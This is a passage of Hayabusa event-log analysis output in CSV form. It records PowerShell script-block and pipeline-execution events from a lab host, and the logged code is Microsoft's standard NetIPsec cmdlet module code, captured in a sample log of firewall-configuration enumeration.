$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.114 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; 
value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeSA""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecQuickModeSA 
",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecMainModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeSA'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.129 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] 
